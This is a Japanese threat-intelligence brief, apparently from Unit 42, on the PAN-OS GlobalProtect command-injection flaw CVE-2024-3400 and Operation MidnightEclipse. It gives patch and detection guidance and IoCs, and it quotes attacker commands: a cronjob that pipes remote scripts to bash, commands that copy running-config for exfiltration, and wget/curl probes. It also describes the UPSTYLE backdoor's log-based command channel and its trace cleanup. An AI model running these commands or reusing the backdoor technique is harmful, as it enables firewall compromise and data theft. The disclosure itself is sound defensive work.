[2024-04-26 08:47 JST 更新] 脅威に関する情報: Operation MidnightEclipse、CVE-2024-3400 に関連するエクスプロイト後の活動

This post is also available in: English (英語)

概要

私たちは共有すべき脅威インテリジェンスを新たに入手しだい、本概要を頻繁に更新しています。全更新履歴は本稿末に記載されています。この更新履歴では、行われたすべての変更の詳細な説明を提供しています。

[2024-04-24 PDT / 2024-04-25 JST 更新] 関連するカスタマー サポート ポータルのナレッジベース記事へのリンクを追加し、新しい XQL 脅威ハンティング クエリーを追加しました。

パロアルトネットワークスと Unit 42 は、CVE-2024-3400 に関連するアクティビティを追跡しており、外部のリサーチャー、パートナー、お客さまと協力しあい、情報を透明性と迅速性をもって共有いたします。

パロアルトネットワークスの PAN-OS ソフトウェアには、深刻度が「重大 (critical)」のコマンド インジェクションの脆弱性が存在します。この脆弱性により、認証されていない攻撃者が、同ファイアウォール上で、root 権限で任意のコードを実行できるようになります。同脆弱性には CVE-2024-3400 が割り当てられ、CVSS スコアは 10.0 となっています。

この問題による影響を受けるのは、GlobalProtect ゲートウェイまたは GlobalProtect ポータル (またはその両方) を構成済みの PAN-OS 10.2、PAN-OS 11.0、および PAN-OS 11.1 ファイアウォールに限られます。PAN-OS ファイアウォールをこの脆弱性に関連する攻撃にさらすために、デバイス テレメトリーを有効にする必要ではありませんでした。

この問題は、クラウド ファイアウォール (Cloud NGFW)、Panorama アプライアンス、または Prisma Access には影響しません。影響を受ける製品とバージョンに関する最新情報については、この問題に関するパロアルトネットワークスのセキュリティ アドバイザリーを参照してください。

パロアルトネットワークスは、この脆弱性を悪用する攻撃の増加を認識しています。この脆弱性の概念実証 (PoC) が第三者によって開示されています。

私たちは、同脆弱性の初期エクスプロイトを Operation MidnightEclipse という名前で追跡しています。私たちは、将来的にはさらにべつの脅威アクターがエクスプロイトをを試みる可能性があると予測しています。

現在の攻撃スコープ のセクションに、私たちが観測したエクスプロイト試行の種類とそれらが相対的にしめる割合についての情報を記載しています。Unit 42 が対応したケースの大半は、失敗に終わった脆弱性のエクスプロイト試行と、デバイスがエクスプロイト可能であることの確認に限定される一部 PAN-OS の侵害であったことに留意していただくことが重要です。そのほかの事例としては、ハード ドライブ上のファイルを Web リクエスト経由でアクセス可能な場所にコピーするという限定的な数の試みと、対話型コマンドの実行につながった非常に限定的な数の侵害が含まれます。

本脅威概要では、同脆弱性に関する情報と脆弱性のエクスプロイト後の状況について私たちが確認している内容を説明します。ここでは脆弱性緩和のためのガイダンスを共有しますが、読者の皆さまには、特定の製品バージョン情報と修復ガイダンスについて、セキュリティ アドバイザリーもご参照いただく必要があります。詳細情報が利用可能になりしだい、本概要は更新されます。

お使いのファイアウォールの侵害が疑われる場合は、パロアルトネットワークスのサポートまでご連絡ください。

この問題は、PAN-OS 10.2.9-h1、PAN-OS 11.0.4-h1、PAN-OS 11.1.2-h3 およびそれ以降のすべての PAN-OS バージョンのホットフィックス リリースで修正されています。一般展開されるそのほかのメンテナンス リリースのホットフィックスも提供される予定です。今後のホットフィックスの ETA について詳しくは、更新されたパロアルトネットワークスのセキュリティ アドバイザリーをご覧ください。

ナレッジベースの記事「How to Remedy CVE-2024-3400 (CVE-2024-3400 の修正方法)」はカスタマー サポート ポータルから確認できます。

パロアルトネットワークスではベスト プラクティスとして、ネットワークの異常なアクティビティの監視と、想定されていないネットワーク アクティビティの調査を推奨します。

この問題を発見し、継続的な調整とご協力を続けてくださいました Volexity に感謝申し上げます。Volexity による分析については、同社のブログをご参照ください。

パロアルトネットワークスのお客様は、以下の方法で CVE-2024-3400 ならびにエクスプロイト後のアクティビティに使われるマルウェアに対する保護と緩和を受けています。

Threat Prevention のサブスクリプションをご利用のお客さまは、Threat ID 95187、95189 および 95191 (Application and Threats (アプリケーションおよび脅威) のコンテンツのバージョン 8836-8695 とそれ以降で利用可) を有効にすることにより、この脆弱性に対する攻撃をブロックできます。弊社のセキュリティ アドバイザリーは、CVE-2024-3400 用の追加 Threat Prevention ID にあたる新規 Threat Prevention コンテンツで更新されています。

これらの Threat ID を適用するさいは、お使いのデバイス上で、同問題のエクスプロイト防止のための脆弱性防御が、GlobalProtect インターフェイスに適用されていることをご確認いただく必要があります。関連する詳細については、LIVEcommunity の記事をご参照ください。

以下のマネージド スレット ハンティングのセクションには、同 CVE のエクスプロイトの兆候を検索するのに使える XQL クエリーを含めてあります。

本稿で扱う脆弱性

CVE-2024-3400

目次

脆弱性の詳細
現在の攻撃スコープ
UPSTYLE と Cronjob バックドアのアクティビティ
ガイダンス
Unit 42 マネージド スレット ハンティング チームによるクエリー
追加の観測されたエクスプロイト
結論
パロアルトネットワークス製品による CVE-2024-3400 からの保護
Advanced Threat Preventionを有効にした次世代ファイアウォールとPrisma Access
Cortex XDR、XSIAM、Unified Cloud Agent
Cortex Xpanse および XSIAM ASM モジュール
IoC (侵害指標)
UPSTYLE バックドア
コマンド & コントロール インフラ
Python バックドアがホストされていた場所
観測されたコマンド
追加リソース
更新履歴

脆弱性の詳細

パロアルトネットワークスの PAN-OS ソフトウェアには、コマンド インジェクションの脆弱性が存在します。この脆弱性により、認証されていない攻撃者が、同ファイアウォール上で、root 権限で任意のコードを実行できるようになります。この問題による影響を受けるのは、GlobalProtect ゲートウェイまたは GlobalProtect ポータル (またはその両方) を構成済みの PAN-OS 10.2、PAN-OS 11.0、および PAN-OS 11.1 ファイアウォールに限られます。PAN-OS ファイアウォールをこの脆弱性に関連する攻撃にさらすために、デバイス テレメトリーを有効にする必要ではありませんでした。

これらの機能を構成済みかどうか確認するには、お使いのファイアウォールの Web インターフェイス上からこれらの項目を確認します。

パロアルトネットワークスはこの脆弱性を悪用する標的型攻撃を認識しています。以下のセクションで、私たちが観測したエクスプロイト後のアクティビティの詳細を説明します。

現在の攻撃スコープ

Palo Alto Networks は、エクスプロイト試行の観測結果をレベル 0 からレベル 3 までのいくつかのレベルに分類してきました。いずれの場合も、セキュリティ アドバイザリーのガイドラインに従うことをお勧めします。

レベル 0: プローブ – 失敗したエクスプロイト試行 - フォレンジック アーティファクトは、顧客ネットワークへのアクセスが試行されましたが、攻撃者が実際には成功しなかったことを示しています。パロアルトネットワークスは、レベル 0 の試行の即時的な影響はほぼないと評価します。

レベル1: テスト – 脆弱性がデバイス上でテストされていました。0 バイトのファイルが作成され、ファイアウォール上に存在します。ただし、不正なコマンド実行されたという指標は見られません。

レベル 2: 潜在的な漏出 – デバイス上のファイルが、Web リクエストを介してアクセス可能な場所にコピーされましたが、その後ファイルがダウンロードされたかどうかは不明です。通常、コピーされたことが観察されるファイルは running_config.xml です。

レベル 3: 対話型アクセス – 対話型コマンドを実行した指標がみられます。これには、シェルベースのバックドア、コードの導入、ファイルのダウンロード、コマンドの実行などが含まれる場合があります。

Unit 42 が対応したケースの大半は、失敗に終わった脆弱性のエクスプロイト試行と、一部のレベル 1 の PAN-OS の侵害であったことに留意していただくことが重要です。そのほかの事例では、標的のファイアウォールの限定的なレベル 2 の侵害や非常に限定的なレベル 3 の侵害が発生していました。

UPSTYLE と Cronjob バックドアのアクティビティ

Operation MidnightEclipse で観測されたアクティビティのなかで、脅威アクターは CVE-2024-3400 を悪用し、ファイアウォール上でコマンドを実行していました。私たちは、この脅威アクターが当初、Python ベースのバックドアをインストールするつもりだったと判定しました。Volexity のリサーチャーはこのバックドアを UPSTYLE の名前で参照しています。脅威アクターは、このキャンペーン専用に UPSTYLE を作成したと考えられます。ただし、脅威アクターは 3 つの異なるエクスプロイト試行の後も UPSTYLE のインストールに失敗していました。3 回目の試行に失敗した後、この脅威アクターは、cronjob バックドアをインストールしてエクスプロイト後のアクティビティを実行することにしました。

UPSTYLE のインストールに失敗後、この脅威アクターは CVE-2024-3400 をエクスプロイトし、ファイアウォール上でいくつかのコマンドを実行したことが確認されています。これらのコマンドのなかには、構成ファイルを Web アプリケーション フォルダーにコピーし、それらのファイルを HTTP リクエスト経由で漏出することが含まれています。次の IP アドレスが、このフォルダーにコピーされた特定の構成ファイルにアクセスしようとしていたことが確認されました。これは、脅威アクターが使っている VPN だと考えられます。

• 66.235.168[.]222

構成ファイルを収集後、この脅威アクターは脆弱性を悪用して次のコマンドを実行し、外部サーバーから bash スクリプト形式で追加のコマンドを受信していました。

• wget -qO- hxxp://172.233.228[.]93/patch|bash

私たちはこの URL でホストされている bash スクリプトにはアクセスできませんでしたが、その直後、脅威アクターが cronjob を 1 つ作成していた証拠を確認しました。この cronjob は 1 分ごとに実行されて同じ外部サーバー上にホストしたコマンドにアクセスし、それらのコマンドを bash 経由で実行するというものでした (以下のコマンドを参照)。

• wget -qO- hxxp://172.233.228[.]93/policy | bash

この URL 経由で実行されたコマンドにはアクセスできませんでしたが、この cronjob ベースのバックドアは、攻撃者のエクスプロイト後のアクティビティの実行に使われたと考えられます。

インストールはできなかったものの、脅威アクターは UPSTYLE をこのキャンペーン専用に作成し、初期バックドアとして使うことを計画していたようです。また、攻撃者が UPSTYLE をインストールできなかった理由には、エクスプロイトの試行自体に含まれるミスや、実行されたコマンドの些細なミスが含まれていました。私たちは UPSTYLE がほかのエクスプロイト試行で使われていたことは確認していませんが、UPSTYLE がほかのデバイスへのインストールに成功していた可能性はあります。

前述のように、脅威アクターは UPSTYLE のインストール用コマンドを実行するためのエクスプロイト試行に 3 回失敗していました。これらの試行のうち、2 回は UPSTYLE が hxxp://144.172.79[.]92/update.py にホストされていました。3 回目のエクスプロイト試行では、攻撃者は nhdata.s3-us-west-2.amazonaws[.]com にバックドアをホストしていました。これは、攻撃者が最初の 2 回のインストール試行の失敗は、ネットワークベースの保護によるものだと考えていたことを示唆している可能性があります。HTTP の Last-Modified ヘッダーによると、脅威アクターが 144.172.79[.]92 にホストした UPSTYLE を最後に変更したのは 2024 年 4 月 7 日のようです。

update.py ファイルは 144.172.79[.]92 にホストされています。またその SHA256 値は、3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac です。このファイルは多段構成のバックドアです。

最初に update.py は次の場所に別の Python スクリプトを書き込みます。

• [省略]/site-packages/system.pth

この Python スクリプトは system.pth として書き込まれ、埋め込まれた Python スクリプトを Base64 としてデコードして実行します。この埋め込まれた Python スクリプトには、protect と check という 2 つの関数があり、この順序で呼び出されます。この protect 関数は SIGTERM シグナルを送信し、system.pth ファイルの内容を自分自身に書き戻します。これはおそらく永続化メカニズムとして行われているものと考えられます。check 関数は、/proc/self/cmdline を読み込んで、自身が monitor mp として実行されているかどうかを確認した後、Base64 で埋め込まれたべつの Python スクリプトを実行します。この Python スクリプトがバックドアとして機能するものです。

この Pythonスクリプトは system.pth によって実行されます。これには、__main という関数があり、スレッド内で実行されます。この関数は、まず次のファイルの内容とそのアクセス時刻および変更時刻を読み取ります。

• [省略]/css/bootstrap.min.css

次に、2 秒ごとに 1 回繰り返される無限ループに入り、次のファイルを読み取ります。

• [省略]/sslvpn_ngx_error.log

次にこのスクリプトは対象ファイルの各行をイテレートして、次の正規表現を使って脅威アクターのコマンドの行を探します。

• img\[([a-zA-Z0-9+/=]+)\]

上記の正規表現が一致した場合、このスクリプトはコマンドの内容を Base64 でエンコードし、それを Python の OS モジュール内の popen メソッドで実行します。sslvpn_ngx_error.log ファイルの正規表現に一致しない行は同ファイルに書き戻されます。これによって実質上、コマンドを含む行が sslvpn_ngx_error.log ファイルに残らないようコマンド行を削除し、後の分析に使えないようにしています。

このコマンドを実行すると、同スクリプトはコマンドの結果を次のファイルに書き込みます。

• [省略]/css/bootstrap.min.css

このスクリプトは別スレッドを作成して restore と呼ばれる関数を実行します。この restore 関数は、bootstrap.min.css ファイルの元の内容と元のアクセス時刻・変更時刻を受け取り、15 秒間スリープして、元の内容をファイルに書き戻し、アクセス時刻・変更時刻を元に戻します。この関数のポイントは、コマンドの結果を分析用に残さないことです。また、バックドアがファイルを上書きする前に結果を取得する時間はわずか 15 秒しかないことから、この脅威アクターはバックドアのクライアント側に自動化を組み込んでいたことが示唆されます。

正規のログ ファイルを使用してコマンドを受信し、正規の CSS ファイルを使用してコマンドの結果を漏出することから、この脅威アクターは、侵害したファイアウォール上での実行用にこのバックドアを特別に開発したと考えられます。

ガイダンス

弊社のお客さまには、デバイスの保護のため、回避策や緩和策が適用されている場合であっても PAN-OS を修正バージョンにただちに更新することを強くお勧めします。

この問題は、PAN-OS 10.2.9-h1、PAN-OS 11.0.4-h1、PAN-OS 11.1.2-h3 およびそれ以降のすべての PAN-OS バージョンのホットフィックス リリースで修正されています。 

今後のホットフィックスの情報と同脆弱性の緩和のための最新中間ガイダンスについて詳しくは、頻繁に更新されているCVE-2024-3400 に関するパロアルトネットワークスのセキュリティ アドバイザリーを参照してください。ナレッジベースの記事「How to Remedy CVE-2024-3400 (CVE-2024-3400 の修正方法)」はカスタマー サポート ポータルから確認できます。

同アドバイザリーの以前のバージョンでは、デバイス テレメトリーの無効化が二次的な緩和策として記載されていましたが、デバイス テレメトリーの無効化はもはや効果的な緩和策ではなくなっています。PAN-OS ファイアウォールをこの脆弱性に関連する攻撃にさらすために、デバイス テレメトリーを有効にする必要ではありませんでした。

Unit 42 マネージド スレット ハンティング チームによるクエリー

Unit 42 マネージド スレット ハンティング チームは、顧客ベース全体に対し、Cortex XDR と XQL クエリー (下記) を使って、本 CVE のエクスプロイト試行を継続的にトラッキングしています。Cortex XDR をご利用のお客さまも以下の XQL クエリーでエクスプロイトの兆候を検索できます。

そのほかに観測されたエクスプロイト

監視を継続するなかで私たちは、Threat ID 95187 の Threat Prevention シグネチャにもとづいて、CVE-2024-3400 を悪用しようとする追加の IP アドレスを確認しました。

これらの指標と Operation MidnightEclipse に関連する指標との間には、何の関係も確認されていません。Operation MidnightEclipse は、ゼロデイ脆弱性と UPSTYLE バックドアの悪用を伴うアクティビティのみでグループ化したものです。

本更新執筆時点では、次の IP アドレスが Threat Prevention シグネチャをトリガーしていました。

• 110.47.250[.]103
• 126.227.76[.]24
• 38.207.148[.]123
• 147.45.70[.]100
• 199.119.206[.]28
• 38.181.70[.]3
• 149.28.194[.]95
• 78.141.232[.]174
• 38.180.128[.]159
• 64.176.226[.]203
• 38.180.106[.]167
• 173.255.223[.]159
• 38.60.218[.]153
• 185.108.105[.]110
• 146.70.192[.]174
• 149.88.27[.]212
• 154.223.16[.]34
• 38.180.41[.]251 
• 203.160.86[.]91
• 45.121.51[.]2

私たちの分析によると、ファイアウォールが脆弱か、または侵害を受けたかを判断する脆弱性のプローブ (調査) 以外では、これらの IP アドレスからの追加アクティビティは確認されていません。Threat Prevention シグネチャがブロックしたエクスプロイト試行内では、次のようなコマンドが確認されています。

• touch [省略]/global-protect/index.css
• touch [省略]/global-protect/portal/css/test.min.css
• cp [省略]/running-config.xml [snip]/global-protect/[16 個のランダムな文字].css

上記のコマンドは、Web アプリケーション フォルダーに空のファイルを作成している touch コマンドの使用例を 2 つ示したものです。この後、クライアントは HTTP リクエスト経由でそのファイルにアクセスして、エクスプロイトが成功したかどうかを判断します。3 番目のコマンドは、アクセス用に実行中の構成を Web アプリケーション フォルダーにコピーするという、もう少し悪性度の高い動作を示しています。

また私たちは、wget か curl を使ってリモート サーバーにアクセスするプローブの試みも確認しています。これらの試みでは、外部の第三者がこのサーバーに対するアウトバウンドの HTTP リクエストを使い、エクスプロイトやコマンド実行の成功可否を判断していました。

• wget srgsd1f.842b727ba4.ipv6.1433.eu[.]org
• wget edcjn.57fe6f5d9d.ipv6.1433.eu[.]org
• curl srgsdf.842b727ba4.ipv6.1433.eu[.]org
• wget --no-check-certificate https://45.121.51[.]2/abc.txt

結論

こちらのセキュリティ アドバイザリーで、パロアルトネットワークス製品への影響と推奨される緩和策に関する最新情報が引き続き提供されます。私たちは、本概要を、エクスプロイトに関する情報とともに継続的に更新していきます。

改めて、パロアルトネットワークスは、この問題を発見し、継続的な調整とご協力を続けてくださいました Volexity に感謝申し上げます。Volexity による分析については、同社のブログをご参照ください。

パロアルトネットワークスは、これらの調査結果を Cyber Threat Alliance (CTA: サイバー脅威アライアンス) のメンバーと共有しました。CTA のメンバーはこのインテリジェンスを使って、お客さまに保護を迅速に提供し、悪意のあるサイバー攻撃者を体系的に阻害できます。詳細は Cyber Threat Alliance にてご確認ください｡

観測済みのエクスプロイト活動に対する保護と緩和策を以下に記載します。これらはさらなる情報を入手しだい更新されます。

パロアルトネットワークス製品による CVE-2024-3400 への保護

パロアルトネットワークスのお客さまには、弊社製品/サービスの保護・更新を通じて同脅威の特定・防御が提供されています。

侵害の懸念があり弊社にインシデントレスポンスに関するご相談をなさりたい場合は、パロアルトネットワークス サポート窓口までお問い合わせください。

Advanced Threat Prevention を有効にした次世代ファイアウォールと Prisma Access

Advanced Threat Prevention セキュリティ サブスクリプションを有効にした次世代ファイアウォール (NGFW-series) では、Threat Prevention シグネチャ 95187、95189 および 95191 が CVE-2024-3400 のエクスプロイト防止を支援します。

Cortex XDR、XSIAM、Unified Cloud Agent 

Cortex XDR および Corrtex XSIAM のエージェントとアナリティクスは、攻撃者が列挙ないしべつの資産へのラテラルムーブを試みた場合に、エクスプロイト後のアクティビティからの保護および検出に役立ちます。

Cortex Xpanse および XSIAM ASM モジュール

Cortex Xpanse には、インターネット上に直接露出している パロアルトネットワークスの GlobalProtect デバイスを特定し、発見結果をセキュリティ担当者にエスカレーションする機能があります。同製品をご利用のお客様は、「Palo Alto Networks GlobalProtect」という Attack Surface Rule (攻撃対象領域ルール) が有効になっていることをご確認ください。これにより、本リスクに関するアラートを有効化できます。特定結果は、Threat Response Center または Expander のインシデント ビューで確認できます。またこの発見結果は、攻撃対象領域管理 (ASM) モジュールをご購入いただいている Cortex XSIAM のお客様もご利用になれます。

IoC (侵害指標)

UPSTYLE バックドア

• 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
• 5460b51da26c060727d128f3b3d6415d1a4c25af6a29fef4cc6b867ad3659078

コマンド & コントロール インフラ

• 172.233.228[.]93
• hxxp://172.233.228[.]93/policy
• hxxp://172.233.228[.]93/patch
• 66.235.168[.]222

Python バックドアがホストされていた場所

• 144.172.79[.]92
• nhdata.s3-us-west-2.amazonaws[.]com

観測されたコマンド

• wget -qO- hxxp://172.233.228[.]93/patch|bash
• wget -qO- hxxp://172.233.228[.]93/policy | bash
• "failed to unmarshal session(.\+.\/" mp-log gpsvc.log* (このコマンドの詳細については、セキュリティ アドバイザリーをご覧ください。)

追加リソース

• How to Remedy CVE-2024-3400 – Knowledge Base, Palo Alto Networks Customer Support Portal
• More on the PAN-OS CVE-2024-3400 – Palo Alto Networks Blog
• CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect Gateway – Palo Alto Networks
• Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400) – Volexity
• Palo Alto Networks Releases Guidance for Vulnerability in PAN-OS, CVE-2024-3400 – Cybersecurity and Infrastructure Security Agency (CISA)

更新履歴

• 2024-04-12 10:15 PDT 初版の英語版に更新、Cortex XDR および XSIAM 製品による保護と追加リソースを追記する。
• 2024-04-12 12:45 PDT 英語版に更新、Cortex Xpanse 製品による保護を追記する。
• 2024-04-14 11:05 PDT 英語版に更新、GlobalProtect ポータルの構成の影響を明確化する。
• 2024-04-14 07:55 PDT 英語版に更新、ホットフィックスが利用可能であること、セキュリティ アドバイザリーに今後のホットフィックスについての ETA が追記されたことを本稿に反映。
• 2024-04-15 08:35 PDT 英語版に更新、「概要」のエクスプロイト アクティビティについて更新。
• 2024-04-16 09:30 JST 英語版更新日 2024-04-15 09:16 PDT 時点の内容にもとづいて日本語の初版を作成。
• 2024-04-17 10:30 JST 英語版更新日 2024-04-16 07:45 PDT の内容を反映し、IoC とコマンドを含む「そのほかに観測されたエクスプロイト」のセクションを追加。
• 2024-04-17 10:30 JST 英語版更新日 2024-04-16 09:48 PDT の内容を反映し、IoC から update.py のファイル名を削除。
• 2024-04-17 10:30 JST 英語版更新日 2024-04-16 14:00 PDT の内容を反映し、「概要」と「中間ガイダンス」のセクションに新たな緩和のガイダンスを追加し、新しい Threat Prevention シグネチャと PAN-OS の修正の提供状況を更新。
• 2024-04-17 10:30 JST 英語版更新日 2024-04-16 14:40 PDT の内容を反映し、「概要」と「脆弱性の詳細」のセクションをよりセキュリティ アドバイザリーの内容に沿う内容に更新。
• 2024-04-18 09:15 JST 英語版更新日 2024-04-17 06:15 PDT の内容を反映し、Threat ID 95191 を追記。
• 2024-04-18 09:15 JST 英語版更新日 2024-04-17 11:30 PDT の内容を反映し、「そのほかに観測されたエクスプロイト」のセクションに箇条書きした項目を追加。
• 2023-04-18 09:15 JST 英語版更新日 2024-04-17 12:23 PDT の内容を反映し、連絡先の項目を更新。
• 2023-04-22 10:13 JST 英語版更新日 2024-04-19 12:45 PDT の内容を反映し、「現在の攻撃スコープ」のセクションと Operation MidnightEclipse のアクティビティ (「UPSTYLE および Cronjob バックドアのアクティビティ」) を大幅に改訂。
• 2023-04-23 10:25 JST 英語版更新日 2024-04-22 15:15 PDT の内容を反映し、「現在の攻撃スコープ」のセクションの観測されているアクティビティのレベルをより詳細に定義。
• 2023-04-24 09:30 JST 英語版更新日 2024-04-23 07:40 PDT の内容を反映し、「現在の攻撃スコープ」のセクションのレベル 2 およびレベル 3 の推奨事項に文言を追加。「ガイダンス」のセクションの文言を明確化。「更新履歴」のセクションを追加。
• 2024-04-25 08:39 JST 英語版更新日 2024-04-23 07:10 PDT の内容を反映し、カスタマー サポート ポータルのナレッジベース記事へのリンクを追加。
• 2024-04-25 10:45 JST 英語版更新日 2024-04-24 18:15 PDT の内容を反映し、既知の IoC のヒットを NGFW トラフィック内、XDR テレメトリー内、NGFW テレメトリー内から探す XQL クエリーを追記
• 2024-04-26 08:47 JST 英語版更新日 2024-04-25 08:00 PDT の内容を反映し、ナレッジベース記事を「追加リソース」セクションに追加。